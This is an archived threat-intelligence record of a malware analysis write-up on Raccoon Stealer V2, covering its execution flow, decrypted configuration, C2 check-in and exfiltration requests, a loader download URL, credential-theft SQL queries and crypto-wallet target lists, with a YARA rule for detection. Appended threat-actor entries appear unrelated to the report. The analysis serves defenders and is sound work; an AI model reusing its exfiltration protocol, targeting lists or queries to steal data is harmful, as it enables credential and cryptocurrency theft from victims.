{
	"id": "e832c1f2-87f3-4704-a847-972b93692dc9",
	"created_at": "2026-04-06T00:07:51.487546Z",
	"updated_at": "2026-04-10T03:37:08.768701Z",
	"deleted_at": null,
	"sha1_hash": "783fd5b25678a528a3486a381f3860dec20d8495",
	"title": "The Trash Panda Reemerges from the Dumpster: Raccoon Stealer V2 – Malware Book Reports",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 121356,
	"plain_text": "The Trash Panda Reemerges from the Dumpster: Raccoon Stealer\r\nV2 – Malware Book Reports\r\nBy muzi\r\nArchived: 2026-04-05 22:59:13 UTC\r\nRaccoon Stealer has emerged from its hiatus, rewritten from the ground up in C/C++, with a new front-end, new\r\nback-end and new data-stealing capabilities. Raccoon Stealer was previously sold as a Malware-as-a-Service\r\n(MaaS) until falling off the radar in March 2022. This shutdown was reportedly due to the loss of a lead developer\r\nof the project during the Russian invasion of Ukraine. After a few months of development, Raccoon Stealer is\r\nback, complete with all its shiny new features, for the price of $275 a month. Let’s [dumpster] dive into this new\r\nversion of Raccoon Stealer and see what it’s all about.\r\nFigure 1: Raccoon Stealer 2.0 Beta Testing Successful (source:\r\nhttps://www.bleepingcomputer.com/news/security/raccoon-stealer-is-back-with-a-new-version-to-steal-your-passwords/)\r\nTechnical Analysis\r\nMD5: 0cfa58846e43dd67b6d9f29e97f6c53e\r\nSHA1: 19d9fbfd9b23d4bd435746a524443f1a962d42fa\r\nSHA256: 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\r\nRaccoon Stealer 2.0 is advertised as lightweight, and it delivers, coming in at around 56 KB. The developers\r\npromise many new features, so let’s examine the execution flow step-by-step and see what this new version has to\r\noffer.\r\nStep 1: Resolve Libs\r\nThe malware kicks off execution by dynamically resolving the libraries and APIs required for later use.\r\nFigure 2: Dynamically Resolve Libraries and APIs\r\nStep 2: Decrypt Strings\r\nAfter resolving the required libraries and their APIs, the malware next decrypts its strings. These strings\r\nare base64-encoded and RC4-encrypted. 
To make analysis easier, I’ve written a Ghidra Script to decrypt these\r\nstrings and comment/label them appropriately.\r\nhttps://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/\r\nPage 1 of 14\n\nFigure 3: Base64 and RC4 Decrypt Strings\r\nStep 3: Decrypt Configuration [C2 Server(s)]\r\nNext, Raccoon Stealer proceeds to decrypt its configuration. In the sample analyzed, only one C2 was present,\r\nthough the code appears to support multiple C2 servers.\r\nFigure 4: Decrypt Configuration\r\nStep 4: Check Locale, Mutex and User Privs\r\nNow that everything has been loaded and decrypted, the malware starts checking various system properties. First,\r\nthe malware calls GetUserDefaultLocaleName and exits if the locale matches “RU”. Next, the\r\nmalware attempts to open an existing mutex object named 8724643052. If that succeeds, another instance is already running, so it exits to prevent running\r\nmultiple instances. Otherwise, the malware creates that mutex. (Note: the mutex name is an unencrypted, hardcoded wide\r\nstring.) Finally, the malware checks what privileges it is running under, specifically whether it is running as SYSTEM (S-1-5-18,\r\nNT Authority\\System).\r\nFigure 5: Open or Create Mutex\r\nFigure 6: Check Privileges\r\nStep 5: Collect System Info, POST to C2\r\nRaccoon Stealer now collects some information on the system to provide to the C2. 
It begins by reading the\r\nmachine GUID from HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid.\r\nFigure 7: Get Machine Guid\r\nNext, it gets the username via ADVAPI32.dll::GetUserNameW.\r\nFigure 8: Get Username\r\nFinally, it concatenates the collected values into the check-in string.\r\nFigure 9: Concatenated Check-in Info to Send to C2\r\nmachineId=\u003cmachine_id\u003e|\u003cUSERNAME\u003e\u0026config_id=\u003cconfig_rc4_key\u003e\r\nOnce basic system information has been collected, Raccoon Stealer sends this information to the C2 server. Note\r\nthe User-Agent of record and that the data is unencrypted and sent over HTTP.\r\nFigure 10: Send Data to C2 Server\r\nPOST / HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nUser-Agent: record\r\nHost: 51.195.166.184\r\nContent-Length: 95\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d\r\nData Ascii: machineId=\u003cmachine_id\u003e|\u003cusername\u003e\u0026configId=\u003cconfig_rc4_key\u003e\r\nStep 6: Retrieve Config From C2\r\nIf the POST to the C2 server is successful, the C2 server returns the configuration, which includes URLs to\r\ndownload the DLL dependencies and the stealer configuration.\r\nNote: The C2 for the sample I analyzed was down, so I modified the sample to use a new C2 server I found and\r\npatched/modified the config for my sample to work correctly. 
I did manage to get more config data as well as a\r\npayload for Raccoon to download and execute.\r\nlibs_nss3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll\r\nlibs_msvcp140:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll\r\nlibs_vcruntime140:http://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll\r\nlibs_mozglue:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll\r\nlibs_freebl3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll\r\nlibs_softokn3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_tronl:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\nlibs_sqlite3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll\r\news_bsc:fhbohimaelbohpjbbldcngcnapndodjp;BinanceChain;Local Extension Settings\r\news_ronin:fnjhmkhhmkbjkkabndcnnogagogbneec;Ronin;Local Extension Settings\r\nwlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*\r\nwlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*\r\nwlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*\r\nwlts_binance:Binance;26;Binance;*app-store.*;-\r\nwlts_coinomi:Coinomi;28;Coinomi\\Coinomi\\wallets;*;-\r\nwlts_electrum:Electrum;26;Electrum\\wallets;*;-\r\nwlts_elecltc:Electrum-LTC;26;Electrum-LTC\\wallets;*;-\r\nwlts_elecbch:ElectronCash;26;ElectronCash\\wallets;*;-\r\nwlts_guarda:Guarda;26;Guarda;*;*cache*,*IndexedDB*\r\nwlts_green:BlockstreamGreen;28;Blockstream\\Green;*;cache,gdk,*logs*\r\nwlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settings\r\nsstmnfo_System Info.txt:System Information:\r\n|Installed 
applications:\r\nlibs_nssdbm3:hxxp://94.158.247[.]24/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll\r\nwlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*\r\nwlts_mymonero:MyMonero;26;MyMonero;*;*cache*\r\nwlts_xmr:Monero;5;Monero\\\\wallets;*.keys;-\r\nwlts_wasabi:Wasabi;26;WalletWasabi\\\\Client;*;*tor*,*log*\r\news_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings\r\news_xdefi:hmeobnfnfcmdkdcmlblgagmfpfboieaf;XDEFI;IndexedDB\r\news_waveskeeper:lpilbniiabackdjcionkobglmddfbcjo;WavesKeeper;Local Extension Settings\r\news_solflare:bhhhlbepdkbapadjdnnojkbgioiodbic;Solflare;Local Extension Settings\r\news_rabby:acmacodkjbdgmoleebolmdjonilkdbch;Rabby;Local Extension Settings\r\news_cyano:dkdedlpgdmmkkfjabffeganieamfklkm;CyanoWallet;Local Extension Settings\r\news_coinbase:hnfanknocfeofbddgcijnmhnfnkdnaad;Coinbase;IndexedDB\r\news_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings\r\news_khc:hcflpincpppdclinealmandijcmnkbgn;KHC;Local Extension Settings\r\news_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settings\r\news_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settings\r\news_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Settings\r\news_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settings\r\news_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settings\r\news_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings\r\news_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settings\r\news_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Settings\r\news_keplr:dmkamcknogkgcdfhhbddcghachkejeap;Keplr;Local Extension Settings\r\news_terra_e:ajkhoeiiokighlmdnlakpjfoobnjinie;TerraStation;Local Extension Settings\r\news_terra:aiifbnbfobpmeekipheeijimdpnlpgpp;TerraStation;Local Extension 
Settings\r\news_liquality:kpfopkelmapcoipemfendmdcghnegimn;Liquality;Local Extension Settings\r\news_saturn:nkddgncdjgjfcddamfgcmfnlhccnimig;SaturnWallet;Local Extension Settings\r\news_guild:nanjmdknhkinifnkgdcggcfnhdaammmj;GuildWallet;Local Extension Settings\r\news_phantom:bfnaelmomeimhlpmgjnjophhpkkoljpa;Phantom;Local Extension Settings\r\news_tronlink:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\news_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settings\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_mewcx:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settings\r\news_ton:cgeeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settings\r\news_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settings\r\news_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settings\r\news_Cosmostation:fpkhgmpbidmiogeglndfbkegfdlnajnf;Cosmostation;Local Extension Settings\r\news_bitkeep:jiidiaalihmmhddjgbnbgdfflelocpak;BitKeep;Local Extension Settings\r\news_gamestopext:pkkjjapmlcncipeecdmlhaipahfdphkd;GameStop;Local Extension Settings\r\news_stargazer:pgiaagfkgcbnmiiolekcfmljdagdhlcm;Stargazer;Local Extension Settings\r\news_clv:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings\r\news_jaxxlibertyext:cjelfplplebdjjenllpjcblmjkfcffne;JaxxLibertyExtension;Local Extension Settings\r\nscrnsht_Screenshot.jpeg:1\r\ntlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\ngrbr_txt:%USERPROFILE%\\Desktop\\|*.txt|*windows*,*recycle*|100|1|1|files\r\ngrbr_sdk:%DSK235%\\|*ledger*,*trezor*,*safepal*,*metamask*|-|15|0|0|files\r\nldr_1:hxxps://bitbucket[.]org/reaXon112233/12333333/downloads/1[.]exe|%APPDATA%\\|exe\r\ntoken:\u003ctoken_id\u003e\r\nField | Description\r\nlibs_\u003cfilename\u003e | DLL dependency filename and address to download it from\r\news_\u003ctarget_software\u003e | Browser-based crypto wallet extensions\r\nwlts_\u003ctarget_software\u003e | Crypto wallets\r\nsstmnfo_\u003cfilename\u003e | String(s) used to structure system info data collected and sent to C2 server\r\nscrnsht_\u003cfilename\u003e | Filename for the screenshot\r\ntlgrm_\u003ctarget_items\u003e | Configuration for what data to collect from Telegram\r\ngrbr_\u003ctarget_data\u003e | Configuration data to target on local drives\r\nldr_\u003ctarget\u003e | Optional field to have Raccoon download and execute additional payload\r\ntoken | Unique ID for the bot used to post data to the C2 (http://\u003cc2\u003e/\u003ctoken\u003e)\r\nFigure 11: Raccoon Stealer Configuration Breakdown\r\nStep 7: Download and Load DLL Dependencies\r\nAfter receiving its configuration, Raccoon Stealer parses out the libs_ fields, each of which contains a DLL filename\r\nand the address to download it from. Next, it loops through them and downloads the following files to the path C:\\Users\\\u003cusername\u003e\\AppData\\LocalLow:\r\nnss3.dll\r\nmsvcp140.dll\r\nvcruntime140.dll\r\nmozglue.dll\r\nfreebl3.dll\r\nsoftokn3.dll\r\nsqlite3.dll\r\nnssdbm3.dll\r\nFigure 12: Download DLL Dependencies\r\nStep 8: Fingerprint System, POST to C2\r\nAfter downloading the DLLs, Raccoon generates a URL based on its unique token. This token is used as the path\r\nfor all future POST requests so that the C2 server can keep track of each infected client's information. 
Next, it\r\ncollects detailed system information (sstmnfo_ in the config) about the infected device and sends it off to the C2.\r\nUser CID\r\nTimeZone\r\nOS Version\r\nArchitecture\r\nCPU Info\r\nRAM Info\r\nDisplay Devices\r\nInstalled Applications\r\nFigure 13: Enumerate SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall to Collect Installed Applications\r\nPOST /\u003ctoken\u003e HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=\u003crandom string\u003e\r\nUser-Agent: record\r\nHost: 51.195.166[.]175\r\nContent-Length: 2463\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--\u003crandom string\u003e\r\nContent-Disposition: form-data; name=\"file\"; filename=\"System Info.txt\"\r\nContent-Type: application/x-object\r\nSystem Information:\r\n- Locale: English\r\n- Time zone:\r\n- OS: Windows 10 Pro\r\n- Architecture: x64\r\n- CPU: Intel Core Processor (Broadwell)X\r\n (2 cores)\r\n- RAM: 4095 MB\r\n- Display size: 1280x720\r\n- Display Devices:\r\n0) Microsoft Basic Display Adapter\r\nInstalled applications:\r\n7-Zip 19.00 (x64)\r\nMozilla Firefox 75.0 (x64 en-US)\r\nMozilla Maintenance Service 75.0\r\nMicrosoft Office Professional Plus 2016 - en-us 16.0.12527.20482\r\nVLC media player 3.0.6\r\nMicrosoft Visual C++ 2010 x64 Redistributable - 10.0.40219\r\nJava 8 Update 66 (64-bit) 8.0.660.17\r\nMicrosoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030\r\nMicrosoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660\r\nMicrosoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161\r\nJava SE Development Kit 8 Update 66 (64-bit) 8.0.660.17\r\nMicrosoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704\r\nMicrosoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704\r\nOffice 16 Click-to-Run Licensing Component 16.0.12527.20482\r\nOffice 16 Click-to-Run Extensibility Component 16.0.12527.20482\r\nOffice 16 
Click-to-Run Localization Component 16.0.12527.20482\r\nMicrosoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660\r\nMicrosoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030\r\nGoogle Chrome 89.0.4389.114\r\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.\r\n--\u003crandom string\u003e\r\nStep 9: Steal All The Data! (…POST to C2)\r\nFinally, Raccoon gets down to business and starts doing what it does best – steal all the data. Raccoon targets all\r\nthe typical info-stealer related data, such as browser data (Cookies, CC info, Autofill, User Profile, Credentials,\r\netc.) as well as what is designated in the configuration received earlier. The Raccoon Stealer data stealing routine\r\nfollows these steps:\r\n1. Steal browser information, including autofill, cookie/password information and credit card data, utilizing\r\nsqlite3.dll\r\n2. Steal data from Firefox using mozglue.dll, such as logins.json, cookies and history\r\n3. Steal crypto wallets, both traditional (wlts_) and browser extensions (ews_), designated in configuration\r\n4. Search the filesystem for wallet.dat to steal\r\n5. Optional file grabber for items listed in configuration, if configured\r\n6. Optional Telegram stealer for data listed in configuration, if configured\r\n7. Optional screenshot grabber, if configured\r\n8. 
Optional loader functionality, if configured (can run a local payload or download and execute a remote one)\r\nFigure 14: Stealer Functionality\r\nBelow are a few examples of data stealing as well as an example of stolen data being exfiltrated.\r\nFigure 15: Steal Chrome Login Data\r\nFigure 16: Example of Chrome Data Targeted by Raccoon Stealer\r\nPOST /\u003ctoken\u003e HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=\u003crandom string\u003e\r\nUser-Agent: record\r\nHost: 51.195.166[.]175\r\nContent-Length: 598\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\\cookies.txt\"\r\nContent-Type: application/xobject\r\n--\u003crandom string\u003e\r\n.google.comTRUE/TRUE13261761828952522NIDdjEwnsz88lgvWAEZj09hSgVlvT1ii6ETMk1LVWQNOCL/b+j6SI6F5DTJDV9/40nSckdtNqAi\r\nStep 10: Execute Additional Payload(s)\r\nRaccoon Stealer V2 optionally supports execution of additional files, indicated by the ldr_ field. The\r\nconfiguration for the sample I analyzed contained the following ldr_ configuration:\r\nldr_1:hxxps://bitbucket[.]org/reaXon112233/12333333/downloads/1[.]exe|%APPDATA%\\|exe. As a remote\r\npayload was listed, Raccoon Stealer will download the file from the URL specified in the configuration to\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\\u003c[a-zA-Z0-9]{8}\u003e, and execute it.\r\nFigure 17: [Optional] Download and Execute Additional Payload(s)\r\nDetection: Yara Rule, Ghidra Script, Config Extractor/String Decryptor\r\nDisclaimer: None of these have really been tested against larger sample sets. 
I focused on this sample in particular.\r\nFeel free to open an issue on GitHub and I can update any of the following.\r\nYara Rule\r\nrule Raccoon_Stealer_V2: raccoon_stealer_v2\r\n{\r\n meta:\r\n author = \"muzi\"\r\n date = \"2022-07-22\"\r\n description = \"Detects Raccoon Stealer V2 (unpacked)\"\r\n hash = \"022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\"\r\n strings:\r\n \r\n // Simple Strings\r\n $s1 = \"Profile %d\" wide\r\n $s2 = \"Login Data\" wide\r\n $s3 = \"0Network\\\\Cookies\" wide\r\n $s4 = \"Web Data\" wide\r\n $s5 = \"*.lnk\" wide\r\n $s6 = \"\\\\ffcookies.txt\" wide\r\n $s7 = \" %s %s\" wide\r\n $s8 = \"wallet.dat\" wide\r\n $s9 = \"S-1-5-18\" wide // malware checks if running as system\r\n /*\r\n LAB_0040878a XREF[1]: 004087be(j)\r\n 0040878a 8b c3 MOV EAX,EBX\r\n 0040878c 8b 0c 9f MOV this,dword ptr [EDI + EBX*0x4]\r\n 0040878f 99 CDQ\r\n 00408790 f7 7d fc IDIV dword ptr [EBP + local_8]\r\n 00408793 8b 45 10 MOV EAX,dword ptr [EBP + param_3]\r\n 00408796 0f be 04 02 MOVSX EAX,byte ptr [EDX + EAX*0x1]\r\n 0040879a 03 c1 ADD EAX,this\r\n 0040879c 03 f0 ADD ESI,EAX\r\n 0040879e 81 e6 ff AND ESI,0x800000ff\r\n 00 00 80\r\n 004087a4 79 08 JNS LAB_004087ae\r\n 004087a6 4e DEC ESI\r\n 004087a7 81 ce 00 OR ESI,0xffffff00\r\n ff ff ff\r\n 004087ad 46 INC ESI\r\n */\r\n // Decryption Routine\r\n $decryption_routine = {\r\n 8B (C0|C1|C2|C3|C5|C6|C7) [0-8]\r\n 8B ?? ?? [0-8]\r\n 99 [0-8]\r\n F7 7D ?? [0-8]\r\n 8B (45|4D|55|5D|6D|75|7D) ?? [0-8]\r\n 0F BE ?? ?? [0-8]\r\n 03 (C1|C2|C3|C5|C6|C7) [0-8]\r\n 03 (F0|F1|F2|F3|F5|F6|F7) [0-8]\r\n 81 E6 ?? ?? ?? ?? [0-8]\r\n 7? ?? [0-8]\r\n 4E [0-8]\r\n 81 CE ?? ?? ?? ?? 
[0-8]\r\n 46\r\n }\r\n /*\r\n 00408130 8b 35 14 MOV ESI,dword ptr [DAT_0040e014]\r\n e0 40 00\r\n 00408136 57 PUSH EDI\r\n 00408137 50 PUSH EAX\r\n 00408138 ff 75 18 PUSH dword ptr [EBP + param_7]\r\n 0040813b ff d1 CALL param_1\r\n 0040813d 8b 7d d0 MOV EDI,dword ptr [EBP + local_34]\r\n 00408140 50 PUSH EAX\r\n 00408141 ff 75 18 PUSH dword ptr [EBP + param_7]\r\n 00408144 57 PUSH EDI\r\n 00408145 ff d6 CALL ESI\r\n 00408147 85 c0 TEST EAX,EAX\r\n 00408149 74 24 JZ LAB_0040816f\r\n 0040814b be 50 c3 MOV ESI,0xc350\r\n 00 00\r\n 00408150 eb 0b JMP LAB_0040815d\r\n LAB_00408152 XREF[1]: 0040816d(j)\r\n 00408152 8b 45 e4 MOV EAX,dword ptr [EBP + local_20]\r\n 00408155 85 c0 TEST EAX,EAX\r\n 00408157 74 16 JZ LAB_0040816f\r\n 00408159 c6 04 18 00 MOV byte ptr [EAX + EBX*0x1],0x0\r\n LAB_0040815d XREF[1]: 00408150(j)\r\n 0040815d a1 fc e0 MOV EAX,[DAT_0040e0fc]\r\n 40 00\r\n 00408162 8d 4d e4 LEA param_1=\u003elocal_20,[EBP + -0x1c]\r\n 00408165 51 PUSH param_1\r\n 00408166 56 PUSH ESI\r\n 00408167 53 PUSH EBX\r\n 00408168 57 PUSH EDI\r\n 00408169 ff d0 CALL EAX\r\n 0040816b 85 c0 TEST EAX,EAX\r\n 0040816d 75 e3 JNZ LAB_00408152\r\n */\r\n // C2 Comms\r\n $c2_comms = {\r\n 8B 35 ?? ?? ?? ?? [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF 75 ?? [0-8]\r\n FF (D0|D1|D2|D3|D5|D6|D7) [0-8]\r\n 8B (45|4D|55|5D|6D|75|7D) ?? [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF 75 ?? [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF (D0|D1|D2|D3|D5|D6|D7) [0-8]\r\n 85 C0 [0-8]\r\n (E2|EB|72|74|75|7C) ?? [0-8]\r\n (B8|B9|BA|BB|BD|BE|BF) ?? ?? ?? ?? [0-8]\r\n (E2|EB|72|74|75|7C) ?? [0-8]\r\n 8B (45|4D|55|5D|6D|75|7D) ?? [0-8]\r\n 85 C0 [0-8]\r\n (E2|EB|72|74|75|7C) ?? [0-8]\r\n C6 ?? ?? ?? [0-8]\r\n A1 ?? ?? ?? ?? [0-8]\r\n 8D 4D ?? 
[0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n (50|51|52|53|55|56|57) [0-8]\r\n FF ?? [0-8]\r\n 85 C0 [0-8]\r\n (E2|EB|72|74|75|7C)\r\n }\r\n condition:\r\n 6 of ($s*) or\r\n ($c2_comms and $decryption_routine)\r\n}\r\nGhidra Script\r\nConfiguration Extractor, String Decryptor\r\npython3 decrypt.py 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\r\nRaccoon Stealer Config:\r\nhxxp://51.195.166[.]184/\r\nRaccoon Stealer Decrypted Strings:\r\news_\r\ngrbr_\r\n%s TRUE %s %s %s %s %s\r\nURL:%s\r\nUSR:%s\r\nPASS:%s\r\n%d) %s\r\n- Locale: %s\r\n- OS: %s\r\n- RAM: %d MB\r\n- Time zone: %c%ld minutes from GMT\r\n- Display size: %dx%d\r\n%d\r\n- Architecture: x%d\r\n- CPU: %s (%d cores)\r\n- Display Devices:\r\n%s\r\nformhistory.sqlite\r\n*\r\n\\\r\n:\r\n%\r\n;\r\n_\r\n|\r\n\\*\r\nlogins.json\r\n\\autofill.txt\r\n\\cookies.txt\r\n\\passwords.txt\r\n---\r\n--\r\n*/*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Type: multipart/form-data; boundary=\r\nContent-Type: text/plain;\r\nUser Data\r\nwallets\r\nwlts_\r\nldr_\r\nsstmnfo_\r\ntoken:\r\nnss3.dll\r\nsqlite3.dll\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\r\nPATH\r\nProductName\r\nsqlite3_prepare_v2\r\nsqlite3_open16\r\nsqlite3_close\r\nsqlite3_step\r\nsqlite3_finalize\r\nsqlite3_column_text16\r\nsqlite3_column_bytes16\r\nSELECT origin_url, username_value, password_value FROM logins\r\nSELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies\r\nSELECT name, value FROM autofill\r\npera\r\nStable\r\nSELECT host, path, isSecure, expiry, name, value FROM moz_cookies\r\nSELECT fieldname, value FROM 
moz_formhistory\r\ncookies.sqlite\r\nmachineId=\r\n\u0026configId=\r\n\"encrypted_key\":\"\r\nstats_version\":\"\r\nContent-Type: application/x-object\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\r\nGET\r\nPOST\r\nLow\r\nMachineGuid\r\nimage/jpeg\r\nGdiPlus.dll\r\nGdi32.dll\r\nGdiplusStartup\r\nGdipDisposeImage\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nBitBlt\r\nCreateCompatibleBitmap\r\nCreateCompatibleDC\r\nDeleteObject\r\nGetObjectW\r\nSelectObject\r\nSetStretchBltMode\r\nStretchBlt\r\nSELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards\r\nNUM:%s\r\nHOLDER:%s\r\nEXP:%s/%s\r\n\\CC.txt\r\nNSS_Init\r\nNSS_Shutdown\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nSECITEM_FreeItem\r\nhostname\":\"\r\n\",\"httpRealm\":\r\nencryptedUsername\":\"\r\n\",\"encryptedPassword\":\"\r\n\",\"guid\":\r\nProfiles\r\nSource: https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/"
	],
	"report_names": [
		"the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
